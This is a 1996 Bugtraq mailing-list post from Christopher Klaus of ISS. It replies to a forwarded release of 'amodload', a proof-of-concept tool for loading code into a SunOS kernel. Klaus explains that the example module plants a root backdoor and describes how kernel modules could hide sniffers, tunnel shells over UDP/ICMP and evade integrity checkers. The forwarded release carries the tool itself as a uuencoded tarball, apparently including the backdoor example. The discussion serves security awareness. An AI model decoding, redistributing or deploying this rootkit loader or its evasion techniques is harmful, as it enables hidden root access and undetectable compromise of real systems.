Bugtraq mailing list archives
Re: BoS: amodload.tar.gz - dynamic SunOS modules
From: cklaus () iss net (Christopher Klaus)
Date: Thu, 20 Jun 1996 09:30:36 -0400
Dear best-of-security () suburbia net, I have been asked to test amodload. I understand Amodload will load modules of code into a SunOS kernel. I would like to know more about Amodload before I try it. Can you supply me with details on how it was designed and tested. What is the desired end result and how can I best recover, if something goes wrong.
BOS is probably not the place for a lot of debate, etc. Just a quick overview of amodload and what it means would still be useful to everyone on BOS. Maybe any debate should continue on bugtraq. amodload is a quick 'hack' that demonstrates how trivial it is to load certain modules or patches into the kernel. The example in the amodload package puts a backdoor into the kernel, so that you can easily obtain root (superuser access) via a simple call. An hacker more sophisticated could/would replace this with something like a sniffer. The sniffer program would never show up in 'ps' or anything that looks at processes. And because the kernel can be modified, ifconfig and cert's cpm program can be given false information so the machine can not be detected in promiscuous mode. Fortunately for hackers, Sun has not given an easy way to detect a promiscuous Solaris box anyways. And another quite possible replacement for amodload is a backdoor that tunnels a shell over a udp/icmp protocol. This provides an easy way back into a network and directly accessing machines. This by-passes many packet filter based firewalls and can not be detected by tripwire/cops/tiger or tcpwrappers. Only an admin carefully watching all the packets going across their network would find this type of backdoor. A amodload type backdoor can be made to survive a warm reboot as well. And because you are modifying the kernel, you can make it almost impossible to detect a modified kernel because the kernel can change any information about itself. Nor has anyone released any type of tools to the public that would even attempt to detect such backdoors. So for today, the best defense is really to take pro-active action and prevent intruders from gaining access to your network. This can be done with a combination of firewalls and having a continuous security assessment program in place where you scan your network for vulnerabilities and correct. You can test your own machine with a scanner from www.iss.net.
Ben, please work with Sonia and Rick and look at capabilities. Thanks, Jack ______________________________ Forward Header __________________________________ Subject: BoS: amodload.tar.gz - dynamic SunOS modules Author: Mark S. Roed at PNT2 Date: 5/28/96 10:22 AM fyi: ______________________________ Forward Header __________________________________ Subject: BoS: amodload.tar.gz - dynamic SunOS modules Author: best-of-security () suburbia net at smtp Date: 5/26/96 12:45 AM Avalon Security Research Tool Release (1) 05/16/96 This release serves two purposes: First, to let you know of important changes in the direction being taken by ASR and secondly to release the first in our series of security tools. Whereas at first ASR was a completely not-for-profit venture we have recently become involved in a commercial undertaking. This change will be transparent to our subscribers as we will continue to release various bug reports and exploits to the security community. Amodload will load modules of code into a SunOS kernel. What this amounts to is essentially a tool which would allow hackers to load arbitrary code into the kernel which would be invisible to any conventional means of detection. This code is offered up as proof of a concept tool. We are aware of these types of tools on the Internet and in active use. In order to counteract tools like this, we first must understand how they work. Amodload should provide some people with this insight. This being said, it should be noted that amodload itself can do no damage, the damage done by amodload and tools like it is from the programs they load into the kernel. Our example code which comes with amodload at the moment is as innocuous as possible. ASR <mcpheea () cadvision com> Note: If you wish to subscribe to the ASR mailing list, send mail to mcpheea () cadvision com with the word SUB and *only* the word SUB in the body. Email directed to ASR may also be sent to mcpheea () cadvision com. If you wish to correspond with ASR please make use of the PGP key given below. -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQBtAy1GTuMAAAEDAM2X2UnGZkuzT5kL8BUfiDniW6rPZgymD8IqUVy7we6Eo7Gm H1iQBEjDoRoBBpm2nCmzOHsHVCs4ABJJH2ByoQ9mpXUZZRu0SbBVpDVQXR09qINs Yp2GhyWA3p0z6AAOzQAFEbQbQVNSIDxtY3BoZWVhQGNhZHZpc2lvbi5jb20+ =qYbo -----END PGP PUBLIC KEY BLOCK----- ------------------------------------------------------------------------------- The following is an attached File item from cc:Mail. It contains information that had to be encoded to ensure successful transmission through various mail systems. To decode the file use the UUDECODE program. --------------------------------- Cut Here --------------------------------- begin 644 amod.tar M'XL("/B4LRT``V%M;V0N=&%R`.T]:U?;2++[%?V*BN>2R&`;23:/"2'WDH3, ML)-`#C";NY>P'%F2;0VRY-$#0V;RWV]5=;<>ML%D$LC,KOLDMM5=757]JD=W MM7B[>[#_>N_XY&_WF`!@H],!^@8PY+<IOS%M;IH(86QN;!C&9GL3<];-]N;? MX#YY6B21M+=R`BPMG0S\!'I^X+4T[:U]X=%/RO5@*)^PX.#P9.]X:6EI-TL' M4?PD@3!*O02B$.QAY`:1[8(=NC"(QN"G@`B[GA_V-:QACT:![[F(XVAO]]7; MO26!._9L=TB85?V6J8B&,++[E2)'%"51%CL>\PJ]*,Y)(SM#VP_U>KG.0*'S M0Q@@,2^>KHCPWI4]'`5>@DT#UX\])XWB:W"B,,6*V`20`(!5,H3#*H%KA]X5 M,74\P5`<9:D?8K]DB>>"7W1.R]&T).O&5&E)S7^HP52J:=K8;!VW4@^)VBD. MQ&XRG&KXV%2D$-R:#VX5X'+\U4#?YQS#YG1N6__FNES_IKF^;FS0^N]8B_7_ M(.GEZS>[/QS##C3[\!TT7_WTC[>O]E[\_(-V^.+OQSL@IWA43.`(>/Y&Q0I[ M"O^E$W1=6W(<PM,,+BZ'*A.:7%F;S\HB?8/$\OR>:<S1_^:ZM2[6_SJ*`,,@ M<;'1;B_6_T.D'U%1YYI[',47R5--6]I5.?21L$;WKCPG(U7O1*Y'*BU%I7KA MQ:$70)<4Y7#D!Z0G"5@;QWY*#^D8Y<70#H)")>JHM`AF;-5;`+N]%!4RXDJ\ M`L2./=`$1E2?6'C-68C^`I_'?CJH4/=#&U6URO81G7>50I+:,?.@V2F#=[V^ M'[(JCWJE^F0T)/UNUD-NT%!`7<TLY9TRL!.@YJ18I%&UG#%JA>1)=DH:W48) M"7E)@B8-:$BNY\4-(",I]E!E.]AL@O3"%-M"RCIU1N=9$L?>K]3;V"]I,B[: M;KMNC,A`DQ1DWZ%5LH3]ZPMD/3].4E4$R%S7XQ&5O,LA=;'A^RDX.$J(+_3& MYQ=#;WB.CY&CUXEX%)/5A/4Y#\T+;,@P4GP.E$U4H=#23F872.9"U74\.OBA M6L1S0_8W]Z@FQUD!)"/L+:R#[>H/8,WU+M>(X7SX;IF[9"0Q6,D4@L1'F^E: MMI]:@_9>ZMN!_]%.?31L%9R<\[(5FFR:GB49UKR&\VZ$#=+K:'Q^ZT7]&4G8 MXO=+8Y[\;Y/\7U]?[VR:9L?HL/S?["SD_T,D=OJDN!!SH>(8@=DR0/\[NF); M#3"__WZCKG&-41SU8WL(XY)P1"VP>VD'N&*.<;EAYC4<H5BW8V<`SX;.:.!Y M]O\XMGOI)[BL6BA&X;FF:<>>!\H)%;11,J#80L'FATZ0T6(C#R51WJ=RRG!M M0S?VO1Y$EUY\Z7MCJC,>2'&/4N*"9*T;D49!-CW40OB=1$,4P,K=HRKLK*+< M15*Q4#[DJUZ3_)9($F3I@F2.3USLAZA;@H"E`VG+HTP(>W*3(1E$6>!"WPN] MF"0E=IT0/W87I45H#[$Y3W*'%:61Z%#E8JOZI(J%M+?#:SC.PL-CZ+3,UO\B MI#,@20_P5OS"-F![8U).2"S)PDX3/Z*D8UXI8-$J=-6Q>#2*XI3]</*+,=M/ MRB5*S.4,T8B$UV,&11TF/$G-+_6!TG)"$;.`I2DB^[\\15":>V[&&H0J():4 M9'M*.G68A31E$)?CQ32^T$4,;D0JQG,&H?]KY@EQ+AFFRB'/#F+(L4D.D\/] MEY*_WSH5NR[W1V.._X]"OR/L_T[;6&^;Y/]OK%L+^?\0J77R(^R^/7SUYG#W M%8Y);0M(V).DKVFMXQ_A8/?M7N[IPX<F+V6O;%7E#L$L,XUQ'/_SX/#=\?ZQ MUGJ1*Q;M%)J7<`9::_\(HNXOGI,V2=QPA5=[QR^/]M^=[!\>:*TW[XJM!EKZ M:*ZAHV&S/2JS=;,NQ!:*?C2HIPT_K40AN8E7808C!=?OD76.ICBI!@^5BR:% M8L]VTIP,*Q821+&'YE^4(Y6"M,5-.>168--/WE'S/S0OM5&,D@L0:S=":>IZ MW:S?)_7AARC(ABQ1E0SU:6<5D:-4ZV4!M9BT5X3&Z'@0:;1=:\O.8%4QF'+F MD(EWKYB1VO'>'NR^.3[$<7UQI'H.L.L:W,<$\^+G'X[Y(4<R]/N#E!O9]0;V M)0UV3'NCR-.8C.TX"R$+R3NP:7/UTL<"K.OW?)3+HC\6XOC/G(J-Z?NC,4?^ MKYL=2\C_=J>-DI^R-M>-A?Q_B/2=M+'A67*=K*77([2S!\^U:C9:^VF4C*<+ MT`9,IW.'0SN<`1LY%]X,:/Q/KO=$0>KZ436KYX3I!%1(CD(UZ^)R6,FH%>=` M-70V')+XYRB[_7[2@"S+&G)G!1\2.][66#3;W0A%\XZQK2$ZA%ZYL)-MC1KK M.^`,4-QV[;AW:AI6YRS/3]"!0.T@^PHN;/=C=KJ!Y1HCY8,I.^X[#;3%^Y=U MSJ3G;8TQKJQ0]K;VFX;SG\K\!L0V9N!C=HY>51]64(MU([=!^C+Q/YX2\5+I M.!IA&7XFDR4CS&O`BFO'`I_JA6[DCT0&<^#:R'REHMC^]YRQ7M_&;,5:WTNC MKEYOH(V?)G;H./0[H(,W;"W"4+.:S6UJT.HJ(QP/4/-R\Y\;\/BQ;"WL[,"3 MYI,Z0?P&D*`20U]17]%U+JZOFG4NHV(M/QI#2]^#)Y=/X*D:*=@QMXOR4NK& MGGU1*G*]GIT%*=9D)=S3:S^'%V$T1A=FQ-X<+"<?PAKV%=.?B;2"\Y/\KK:8 M.^H3=P7W*>R`'%W,P;F$SS2QHI$7Z@<_OWG3@/+GX?G1J_='8IJ<&F>""[\' M.M?<82C5+=Z5GZ(*%]W.,(B7EP5!-]#?O*K#HQTP5!^/O#B.8KV6P]7R5N:X M<N8)H>QB59]\+=W'I8&83_VS5GA.+BV1(+:VP5]=K1>]IGIY.7D*L#SBKJU4 M+#U>VD'FE:G3&L6>TN5LK1.DD4-NSP+1=5U,W;I.1?75=AT>@W'5$\F1?2GV M4B=0FU74*!LF(:P)"!08DR#M$@C!B)7"DZ`!CZOKMQC8<A^7>HTK__+$Q4DI M-WYY7]O_Z*F^E(BE/##/5K?D5*"%.3:18V:05W==7Q%PJ\95V\#UO+8"]`N< M+!F0%[^R5JK9N:5F"6RC`L9]7B[>FE7,Y2B10!TODGPQ&[).`]Z;YX>O7UM' M>R<-*:=Q*I>FN)C>LNEN=)'5:54TS7R*R^[CF?X4Q47(!FS/1X=`;-*2!R`7 M.J.Y90F0B"P/,M&;G(7$%,,]JB[.&4-;&MWWNT<'^P<_/$7FD,$L""#J]1(O MY24F^$1Q%%PQFX2^X#)(O&E\8SNF7:C/PJ>XUU'3T'"@")?]*G4&Z;GZA`21 M]'IV:@?`G8SCB$Y0FJ&YCY/59?`6TT&\LSL7_Q?]N[HCZ&T72X8(WV'%@%!* MG[5H!.KI-:/$)WNX0GS*7E!<R&4P.=]*(I7KWB92>9);$PMS8MU8$ZMOJKBZ MZHJY(8NW9A7/7'667'7X_=Z:O>I*75LZZ:%-O=))4C'X8GIQOQ'13]K"^_M3 MI\(\OC\:,&?_K[VQ(>-_C(U.NPT+_^_A$AH!+!NC'MBM*$M5B!QJ2+%9AE;! M=V@VTP'HCWN[KX[W_V\/S8:.08(A+RE4-E!AIRBP)@JPDG246(VS^4?BZC<A M3&OGXBR^!I\:H+*$O499*B?+0O^JG%$<EJM<4L3:)Q1!%7*LOBOT6#%B)885 M,E,:+SF8$J7&E2%2ARE0U![JUX$/R\L#_X-N7*&"04=H>3DR:CD/HAD$BQ8$ MEQ%$$-T(?SOJ8!:HP!Q8TY@#:P)\XL=$HZTO:/0LSB1C,YH\LQTW(#9O;K(Y M`_,D^(PF?^M5]^=)ZAQTK1_%O7O:!)PC_Z&SV5'G_Y;%YS\;F^;B_/]!$LK_ M]_)PEHX64A^=><^.@VLZ!\HHKNJ68WT-5FXXV7].1>H(PX8DS;IYS``%27F) M.*3/#QIDH5;6-S_M'1WLO=%NV*(L-O-DX(W8.E.9V)*)O2ZQM87>@!>'>78Y MU$D8R5B1]F>*?./*DDZO,'-UA,#G3_\64B1?__3#O!\!`//B?\QVOO[-=0NS M-@UC$?_](&G6^J<+!%]W^5,$:`,<BK!IB(-9.[DF0>!ZJ8?&F;I;$?6H(H?P MV&$>DR-/(3E*4H0$VD`&H#IPS1*Z8H(5D?]!Y":`=FS@A^+FQ2PI0R>]H0S1 M":@B'V';3BHB^<2E#7&V2R$_(D+0:[%PNJ-TFCA`L8GJK*./=$8VTH^G<^5I M*DL^*<2D:8NE=%8MOD[IQ$'NWU<$(V_<^_U^X"E))RM8YEDKN3X/[;@/*/F, M[>DR.J#!(E&]+`I-%H1:&;>@)EG+G!C[<F5HT[>@*GXC-B=VHM&UGK6R<\JI MEXN;SYWX///=G!\%A1D*6<&%\6\CCA\\3<K_5NH[%U_Y.M`<^0^FL2GC?ZP. MVX*F82W\_X=)XKZ<7+/B)%:WY(XENF.X!'5I_-".8:#7UKI^N)8,:@VH\>=B M[?VED[K#>)\TYOA_G75+QG]LK&]L&F3_K2/\8OT_1/K"^(\9,1TW!V5H:&SF MUI.\9\C^GM_#W#PKM[!<KTMG*G1#6+<;T$4+L@$NG?E\X!TJ=2ZA@&#Y*O_' MQQ"E2@V8A:JN31(3AS\5:M/$1`SD7&I3N(@<'][-(EI4F=4!.?N((73]GC8W M[*02KA+8?1&NTJB$KD@[LA3TDN<I!UELOA8V92DF9&R/&S#R4SHAZ_6P@>C5 MT['14`2W8'$>VT)0(K@&(;>+,!RL40JR&<KP%ZXTCH:GEG&VK6S7V*\&PTR' MNRBL(I*G!(J=NCTSH`%*QZ?RQAIY)\5EMO&R"^I.-0\R-DI9S[(F\HFZ$`%; MQWDYT0[I?A.52F4Z#9[?UJX5!YLZ-A-MW#RPAL&I]^:?PC[-:U$82_E`ECBO MAK(0E<<H@_\;M;CGUN`IU!R'SFLQ__ESV)HZP2R%M$RW)"HWO-0*.D]F*#$S MC"\Z2?;GG"1/L55F2APJ<]'C8N(404U?$H11&YLU.1'E:3),)T6E+--PPA?A M9[QP&XPXZNG555U?Z=QRYDRX;CMRGHQ3T86,L,Y:HU@>F@CP+OMCC\5@/9Z& M:D"G&.*IAHAJXG"=.\,X6S6M/\AWE8@ZD<^IE-:^05W^!0?RL\E\^:C,)2QT MI[[[^GS_@`[=CP]?_G1^?'*TM_M66-7%Q)$#0P-YYX%YL,9,3O1Y$P15T?U/ MD.HT_*()@N6T>I0NJ>O4`E@E15;9%4:XOZ`K)%Y&<K\TX';[?]-L=]3[/ZR. MP?'?9MM<V/\/D>YD_]\YS/OSHK9GFI]L))+AT+=1Q/^:V1<-0(NW+BU)S"W, M1RI5)B;"E*U'E)C*R%59J=VM&)1A81.B+`P\)EF'9]"&WW]78664=UHJ;IIG M9)0\B9X0T&2A)0I;3^I*U-P>`[AW='1X]!3VP8UXMYFOTF!OAV1N-!`N\"C8 M.1EYCM^[!AM:$8=EL-U!%&\/"91FX5=`/U-M@AZB9.Q%,=UZGRUAJ?`6$8Y] M%SJHVG"TF&"#MOZD+J,1E'V+/[EO99"QHL_30F!&0,*#.0VJ6(X652R-;23^ M.,R9(=Y#-G95CA3D89E!V94X=]#06PZN:F)."I!9IB/%2,M*N!RP&[`>[YFA M9=N,R(ILOI"N6?.$'W=A[7+(YQG-`VAZ*D95!*A6;4GN)^8E'YU/DWMS`1F^ M-?'9),N<*]445<X^J4DTM>8N94@&RN1JS0,&]>A31LF4R$ZU\;4M7M81,3-H MQS]Z]`@;H/8.Y<"KLP(VQ^D%'0T0(9:_9&%JJT5.!87KR(&A2OTR7.F61,]6 M![OJ,`1;"4EH?_Q8"F]E*!QOCK@79"G*_O#@S3]OF+D$-&?Z]XB40(U6&9.\ M:140Y&TVQHJ,S$21.M*-AN"_E:3G9*LUX-W1X<DYW<YOP-O==^?OCO;_L7NR MUP!)VRB,/XFH"/^<9H9HS+&J;G"%J*9PA/@0;GD$N#B?*C=(=*N,F*TTH%@L M8OA65^E"A%XRJ03;JVC&UF%UPGV:";AU5T`T,`7Y.Y"^$]Q6!0[@)KB"L,C8 M@;:5S__<O:<?URA2[+A>BL.ZSB?_K[23\1O/$29P@1^T9.*+7(VE_A69]MT\ MP[%QO0_LM'2SY](./^+8(,=B4>"/4HCP4,0Y2&'+#$C>I5A%<!$H?$T>,SZ) M`.5<&!-7A$_<O""FZZMF<>\']&:30<K./[%T(P^(X91JK%BH;Q%7X0XI@2Q: M5($K/Y[E%2H@2)`JEE;>#-:%?*-[+M3/.^8V?3W;(4C^*6^XW*4-!"[;8-W4 MAEJR]J\/'QZ-[&39;:VL+2=K-3'"HCT%BG*+1&ZE/942T5:2WL7*IE)N$LJ$ M%6O5K`PA%1I<A_:#BHT<G%U?IN()"R*YQ1XJ[031P7N!2PS#[:.0I^*J$0FH MVD3GE1_/R@14M5Q5Y3,#E,F`:RLOPM\4'(2?9<-!7,[JEAB2I@0!/GL&6_`[ MY.ZR,M5D9^BX7)5FDM)@IFJJ=+I<BP6]<K=#<2V-"5`TA23`"_GP_"7JDI/? M#\_?'Q$95"`;AG$SL9J#CKAXFY<WQ"ZDJ!"R$FMW8,#-1I;.`JF8_IR'3#7` M+$T;S[E4AXN>*X8O+YTR-E[R.U+(I&5C`VN4QT_QG6.[;>.B9,WB-/U">W;^ M9"]-.7I9HJ/N(>'(Y&B_VK2;,>7*EB+O^(I]WUK3$4R(2XA37<G50-6ZN0,6 M`1E_L40OF;UO&D"[.\;-\7]6IXT0IF&V#6.38D%HNVCQ_L<'2:U^$'7M0#J= MFKPGR+8?O>YC.4'1W?Q^HT&_EI8>B9`R+A:Q^@-?-Z[6MRCR/N([(1R8SY<< M@FBBB*/(SJLO&,QQHLEL7#D,%L18PURJ%IG&)-7>EF%8!FHNHE70YFL03+L" M8`E[5O!VBA56Z3[*V0019Y*(:6S1Y0=/X*@`6[-HW@;?F41NF.)J!0.WJ\!; MDE^!_)2:"!/<6DX!TU8PZ,E,PK4-(9J3-(J]B6YM=_(N#S8FRYB'+I1NUTP` M,`-AA#.C6M`QM*FLSG36EO:(0L.@>TTO9TPC.@;4S0V@EXN1,^]'85)?J)'[ M3)67C-\3#9AS_\_:[.3W__@N(&RT%_'?#Y/^F/PG;]5<<N-HQ,?AJZZ=VN), M7.P,H;PG$"M_Q7WQAOO:U]`$A+R]1*^`'>?O\(IZH"[W$PLH"LF'ET'>%-/- MM3I29$<A!%BYZZ?)0C$L%,-_;**_&G'?-.;:_QS_*>U_4]K_B_<_/DCZ*O;_ ME"4N9)\QTQ"?MN,=;]W;<D6I68A.,Z\^!<#Z`W]/:H;.#6+'W)H4\E+T?*:8 MQ\+/%/1*[7V.O)^N,%/F0SG=3?S/!+]_+8"?=](#?$STK5?$?U:J_-6@>Z(Q MU_ZW2O;_^J:P_Q?[/P^2OMC^5^9W\9:IW`"O^`#EOW%5DP:\JHO@+-'[D7@[ C+TEY9:S/JKW0``L-L$B+M$B+M$B+M$A_./T_+/;S/`!X```` end
-- Christopher William Klaus Voice: (404)252-7270. Fax: (404)252-2427 Internet Security Systems, Inc. "Internet Scanner finds Ste. 115, 5871 Glenridge Dr, Atlanta, GA 30328 your network security holes Web: http://iss.net/ Email: cklaus () iss net before the hackers do."
Current thread:
- Re: BoS: amodload.tar.gz - dynamic SunOS modules Christopher Klaus (Jun 20)
- Re: BoS: amodload.tar.gz - dynamic SunOS modules Dana Bourgeois (Jun 20)
- <Possible follow-ups>
- Re: BoS: amodload.tar.gz - dynamic SunOS modules Dan Stromberg (Jun 20)
- Re: BoS: amodload.tar.gz - dynamic SunOS modules der Mouse (Jun 20)
- Re: BoS: amodload.tar.gz - dynamic SunOS modules Markus Zellner (Jun 20)
- Re: BoS: amodload.tar.gz - dynamic SunOS modules Brian Denehy (Jun 20)
- Re: BoS: amodload.tar.gz - dynamic SunOS modules Brett Lymn (Jun 20)
- Re: BoS: amodload.tar.gz - dynamic SunOS modules Piete Brooks (Jun 20)
- Re: BoS: amodload.tar.gz - dynamic SunOS modules Brett Lymn (Jun 21)
- Re: BoS: amodload.tar.gz - dynamic SunOS modules Markus Zellner (Jun 20)
- Re: BoS: amodload.tar.gz - dynamic SunOS modules Dave Matthews (Jun 20)
- Re: BoS: amodload.tar.gz - dynamic SunOS modules Dan Stromberg (Jun 21)